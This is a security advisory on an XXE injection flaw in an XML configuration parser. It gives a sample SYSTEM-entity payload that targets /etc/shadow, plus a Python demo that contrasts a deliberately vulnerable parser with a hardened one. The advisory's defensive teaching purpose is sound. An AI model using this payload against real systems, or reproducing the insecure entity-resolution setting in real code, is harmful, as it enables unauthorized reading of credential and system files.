Critical XXE Injection in XML Configuration Parser Exposes Sensitive System Files
A critical XML External Entity (XXE) injection vulnerability has been identified in an XML Configuration Validation module, exposing it to unauthorized data exfiltration. The flaw, rated CVSS 9.1, stems from an insecurely configured XML parser that processes user-supplied configuration files. The parser resolves external entities declared in a document's Document Type Definition (DTD), so an attacker who controls the configuration file can declare an entity whose SYSTEM identifier points at a local file and have the parser read that file into the document.
The vulnerability resides in the Configuration XML parser component. An attacker exploits it by uploading or submitting a crafted XML configuration file whose DTD declares an external entity with a SYSTEM identifier, for example `<!ENTITY xxe SYSTEM "file:///etc/shadow">`, and then references that entity (`&xxe;`) inside a configuration element. The target can be any file the parsing process is permitted to read: `/flag.txt`, `/etc/shadow` (which additionally requires the parser to run as root), or application source code. During the standard validation phase, the vulnerable parser resolves the entity's URI and replaces the entity reference with the content of the targeted file, so the file's contents become part of the parsed configuration and travel wherever that value is stored or echoed back; that is what turns a local file read into exfiltration.
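The following is an added example, not code from the affected module or the advisory's authors. It reproduces the flaw described above with Python's standard-library `xml.sax` (expat-backed) reader: the vulnerable parser switches on resolution of external general entities, the hardened parser leaves it off and refuses any DOCTYPE, and both are fed the same SYSTEM-entity payload. The element names (`db_host`, `db_password`), the secret file and the payload are all constructed for the demo; the `file://` URI assumes a POSIX filesystem.

```python
"""XXE in an XML configuration parser: vulnerable vs hardened (added example).

Reproduces the advisory's flaw with Python's stdlib xml.sax (expat).
Element names, the secret file and the payload are constructed for the
demo; paths assume a POSIX filesystem.
"""
import io
import os
import tempfile
import xml.sax
from xml.sax import handler


class DoctypeRejected(Exception):
    """Raised by the hardened parser when a configuration file carries a DTD."""


class _ConfigHandler(handler.ContentHandler):
    """Collects element text into a flat dict, e.g. {"db_host": "db.internal"}."""

    def __init__(self):
        super().__init__()
        self.values = {}
        self._current = None
        self._buf = []

    def startElement(self, name, attrs):
        self._current = name
        self._buf = []

    def characters(self, content):
        # Text expanded from an external entity arrives here too, so a
        # resolved SYSTEM entity lands straight in the parsed config value.
        self._buf.append(content)

    def endElement(self, name):
        if self._current == name:
            self.values[name] = "".join(self._buf)
        self._current = None


class _RejectDoctype:
    """Lexical handler for xml.sax's expat reader. expatreader wires up all
    five callbacks, so all five must exist; only startDTD does anything."""

    def comment(self, content): pass
    def startCDATA(self): pass
    def endCDATA(self): pass
    def endDTD(self): pass

    def startDTD(self, name, public_id, system_id):
        raise DoctypeRejected(f"DOCTYPE {name!r} is not allowed in a configuration file")


def xxe_payload(target_uri):
    """Constructed attacker payload: the internal DTD subset declares a SYSTEM
    entity for target_uri and a config element references it."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE config [<!ENTITY xxe SYSTEM "{target_uri}">]>\n'
        "<config><db_host>db.internal</db_host>"
        "<db_password>&xxe;</db_password></config>\n"
    ).encode()


def parse_config_vulnerable(data):
    """The advisory's flaw: external general entities are resolved, so the
    SYSTEM entity's target file is read and substituted into the document."""
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, True)  # the insecure setting
    ch = _ConfigHandler()
    parser.setContentHandler(ch)
    parser.parse(io.BytesIO(data))
    return ch.values


def parse_config_hardened(data):
    """Fix: never resolve external entities, and refuse any DOCTYPE at all,
    since a configuration file has no legitimate need for a DTD."""
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, False)
    parser.setFeature(handler.feature_external_pes, False)
    parser.setProperty(handler.property_lexical_handler, _RejectDoctype())
    ch = _ConfigHandler()
    parser.setContentHandler(ch)
    parser.parse(io.BytesIO(data))
    return ch.values


def demo():
    """Write a constructed secret (standing in for /etc/shadow or /flag.txt),
    then feed the same payload to both parsers.
    Returns (text leaked by the vulnerable parser, hardened parser's error)."""
    secret_path = os.path.join(tempfile.mkdtemp(), "secret.txt")
    with open(secret_path, "w") as fh:
        fh.write("s3cr3t-token")
    payload = xxe_payload("file://" + secret_path)

    leaked = parse_config_vulnerable(payload)["db_password"]
    try:
        parse_config_hardened(payload)
        blocked = None
    except DoctypeRejected as exc:
        blocked = str(exc)
    return leaked, blocked


if __name__ == "__main__":
    leaked, blocked = demo()
    print("vulnerable parser leaked:", leaked)
    print("hardened parser said:", blocked)
```

Two practitioner notes. First, the vulnerable parser only succeeds when the target file is well-formed entity text: a file containing a bare `<` or `&` aborts the parse with an entity-reference error, which is why real-world XXE payloads reach for parameter entities or out-of-band channels when the plain SYSTEM entity fails. Second, turning off external entity resolution alone (the `feature_external_ges` default in Python 3.7.1 and later) stops the file read but still lets the DTD be processed; rejecting DOCTYPE outright, as the hardened parser does, also removes the attack surface for entity-expansion denial of service.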
The severity is reflected in its CVSS vector (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N): exploitable over the network, low attack complexity, no privileges and no user interaction required, scope unchanged, and no availability impact. Successful exploitation is rated High for both confidentiality and integrity, allowing attackers to read sensitive data and potentially manipulate system state; the integrity rating is what lifts the score to 9.1, since the same vector with confidentiality impact alone scores 7.5. This vulnerability represents a fundamental failure in secure parsing logic, and any system using this module is at immediate risk of data breach. The remedy is the standard one for XXE: configure the parser to reject DOCTYPE declarations outright or, at minimum, never to resolve external general or parameter entities.